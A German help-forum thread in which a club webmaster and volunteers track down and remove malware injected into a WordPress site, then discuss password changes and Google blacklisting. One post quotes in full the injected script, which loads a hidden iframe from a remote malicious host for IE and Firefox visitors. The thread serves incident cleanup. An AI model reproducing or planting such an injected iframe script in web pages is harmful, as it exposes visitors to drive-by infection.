|
Trojaner auf Website Hallo Leute, und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/) Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich plötzlich, kurz nach Öffnen der Seite werden teilweise auch auf den jeweiligen Rechnern Viren gefunden. Es gab eine Meldung des Trojaners "Exploit-CVE2010-0806" und die IP-Adressen von "hxxp://194.60.242.36/sv/count.php?add=1" bzw. "hxxp://194.60.242.166" werden als schädlich erkannt. Der Hoster hat bei sich schon einen Virenscan durchgeführt, war aber fehlerfrei. Könnt ihr mir weiterhelfen? Viele Grüße Clemens |
Ja, möglich. :pfeiff: Aber eigentlich sollte dies euer Webmaster tun und können. Man müsste auch wissen, was wurde bereits getan bzw. wurde schon was getan? Zumindest auf der Startseite befinden sich wohl Code-Reste die dort auf jeden Fall falsch sind - könnte aber die unsaubere und unvollendete Säuberung von der eventuellen Malware sein. 194.60.242.36 ist auf jeden Fall in Sibirien. Auf welcher Seite kommt denn die Virenwarnung? |
Einzige was bisher getan wurde, das Plugin von Google Analytics gelöscht, weil das da stand, als ich auf eine der IP-Adressen gegangen bin, aber hatte wohl eher weniger damit zu tun. Die Meldung kommt bei jeder Seite, die man öffnet. Ist ja die Frage, ob unbewusst irgendeine schädliche Datei hochgeladen wurde, die zu löschen ist oder sich jmd eingehackt hat und was eingepflanzt hat. |
Möglicherweise/wahrscheinlich sitzt die Malware im "Theme" => ...ttcelbe.de/wordpress/wp-content/themes/traction_pro/javascripts/ traction . js Zeile 9 |
Cool, danke! Das scheint es wirklich gewesen zu sein, die eine Zeile wurde dort neu hinzugefügt und jetzt werden keine Meldungen mehr angezeigt. Wie bist du auf die Datei gekommen? |
Ohne JavaScript war nichts. Direkte Links und in den Seiten (im Quelltext) sich befindende Scripts (bzw. der Quelltext an sich) schienen sauber zu sein, meinem Auge ist nichts aufgefallen außer auf der Startseite ganz unten nach </body> und </html> befindet sich noch ein </div>. Dies hat dort nichts zu suchen. Allerdings ist dort unten "gerne" fremder ("illegaler") Content, deshalb habe ich u.a. dort manuell einfach im Quelltext nachgesehen. Also musste die Malware in einem "externen" Script sein. Und weil mir es zu blöd war da alles manuell zu durchsuchen, habe ich zu meiner Linklesezeichenliste gegriffen. http://sitecheck.sucuri.net/scanner/ Und die Zeile 9 hat auch (dann) das typische Aussehen eines maliciösen Inhalts gehabt. :blabla: BTW: Zitat:
|
Achso alles klar, die Seite muss ich mir gleich mal merken ;-) Ist es jetzt auch am sinnvollsten FTP-PW etc. zu ändern? |
Ja, unbedingt das FTP-Passwort (alle!) ändern. Also die Passwörter aller (!) FTP-Zugänge zu dieser Internet-Präsenz und außerdem sollten ALLE PCs, auf denen ein FTP-Zugang zu dieser Internetpräsenz eingerichtet ist, sorgfältig und tiefgehend überprüft werden und zumindest auf dem ursächlichen PC auch wiederum alle FTP-Passwörter geändert werden. |
Hey, ich muss mich jetzt nach einiger Zeit nochmals melden. Gleiche Website - ähnliches Problem. Ich weiß nicht, ob es noch Überreste der letzten Malware sind oder ob es wieder etwas neues ist. Jedenfalls wurde unsere Website nun von Google gesperrt. Jedoch ist sie (meist) nur im FF nicht erreichbar. Problem, was ich bisher gefunden habe - fremder Code am Ende der Startseite: Code: <script>var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>Danke für eure Hilfe... clemixx |
Du hättest dir BEVOR du was verändert hattest, einfach mal Datum und Uhrzeit ansehen sollen. Es ist immer auch ein Möglichkeit, dass ein Hoster eines Multidomainservers tatsächlich auch ein grundlegendes Problem hat, dann sollten aber eher alle Domains/Websites auf mindestens diesem einem Server betroffen sein. An sich ist meines Wissens dein Hoster aber nicht als dunkleres Schaf (grau oder schwarz) bekannt. Allerdings können falsche Rechtevergabe und veraltete Serversoftware, PHP-Versionen und darauf aufsetzende Anwendungen schon auch Lücken schaffen. Und mancher Hoster belässt auf alten Verträgen/alten Servern auch längst grob veraltete Software. |
Von allen hab ich das nicht getan, aber bei den Hauptdateien war nichts auffälliges. Ja dächte ich eigentlich auch nicht, aber da es nun doch anscheinend bei einigen Websites diese Probleme gibt und sich der Hoster auch nicht auf meine Nachfragen meldet..! Muss ja auch nur mindestens dieser eine Server betroffen sein.. Noch etwas, was ich an meiner Stelle jetzt tun kann? |
Zitat:
Du magst einfach mal bei den dir bekannten Websites mit ähnlichem/gleichem Problem schauen, ob sie auf dem selben Server liegen ping domain-name.tld Darüber hinaus kontrolliere ob Server-Software (Webserver, PHP etc.) aktuell ist. Wenn nicht, sprich deinen Hoster mal auf eine Aktualisierung an, es ist aber Branchenüblich, dass die Software gerne auf dem Stand des Vertragsabschlusses bleibt (vorallem wenn der alte Vertrag irgendwo besser ist, du also für diese Leistung UND neues PHP (als Beispiel) etwas mehr zahlen musst). |
Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist. Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?! Also der Großteil der betroffenen Websites liegt tatsächlich auf dem gleichen Server. Ja das ist richtig, die Software ist nicht die aktuellste, könnte man in Zukunft aktualisieren. |
Zitat:
Erreichbar ist die Site (technisch) natürlich schon, nur nicht über die Google-Suche und nicht direkt und ohne Warnhinweis über Browser, die sich auf Googles Warnung verlassen. |
Naja erreichbar ist sie vlt, aber sollte man ja aufrgund der Malware schon meiden, was? So nachdem ich im Wordpress-Verzeichnis ewig nach Infektionen gesucht habe, habe ich nun gesehen, dass sich im root noch eine index.php befindet, in der relativ lange Zeichenketten eingebunden waren, die so da nicht hingehörten. Ob die wohl durch ein Plug-In, der (leicht) veralteten Software auf dem Server oder anderes dahin gelangt sind, weiß ich nicht. Aber jetzt sollte es zumindest wieder gehen. ;) |
Ich weiß jetzt nicht wie man das ergebnis nun einschätzen soll, https://www.virustotal.com/url/1e11f...is/1340816965/ THN |
Zitat:
Und definitiv (!) ist Google-Safebrowsing-"Analyse" keine "Echtzeitanalyse". Die Meldung von Trendmicro müsste an mal darauf ansehen ob die aktuell nachsehen oder auch mal (für Google?/von Google?) u.U. veraltetet Informationen sammeln. |
Also meinst du das muß nichts heißen, oder alles, oder F/P .... THN |
So, Google hat die Seite nun als nicht mehr bedrohlich eingestuft und sie ist wieder erreichbar. Eine Meldung bei Trendmicro bzw. Sucuri SiteCheck wird immernoch angezeigt, aber denke dass es keine Echtzeitanalyse ist. |
Hallo, ist diese Warnmeldung echt oder sollte man sich von dieser Website fernhalten: hxxp://sitecheck.sucuri.net/results/www.changetec24.de MfG. Andreas |
Zitat:
Auf jeden Fall erkennen einige Websitescanner keine Malware, sucuri.net selber sagt bei "Blacklistingstatus", dass niemand (davon) die Site als gefährlich ansieht und bieten für den Fall des Falls ihre (kommerziellen) Dienste an. Virustotal sucht schon seit einiger Zeit und sucht und sucht. Definitiv (!) gibt es aber auf dem Webspace eine deutlich veraltete jQuery JavaScript Library v1.4.2 an deren Ende codierter, sehr wahrscheinlich tatsächlich bösartiger Inhalt angehängt wurde. Ob auf diese (veraltete) Library beim normalen Websitebesuch zugegriffen wurde, habe ich jetzt nicht geprüft, dazu fehlt mir die Zeit. Die weiteren Fundstellen habe ich nicht überprüft. Hast du mit denen (changetec24) was zu tun? |
Hallo, Danke für Deine Einschätzung. Die Anfrage habe ich wohl falsch formuliert, sorry. Mit der Website habe ich nichts zu tun, vor einem Sprung dorthin aber mal sucuri vorgeworfen. Ebenso vorhin hxxp://sitecheck.sucuri.net/results/www.datasheetcatalog.org - dort scheint viel Binärzeug drin zu stecken. Früher habe ich diese Website öfter benutzt, da war sie wohl sauber. Heute warnt schon Google davor. MfG. Andreas |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 04:32 Uhr. |
Copyright ©2000-2025, Trojaner-Board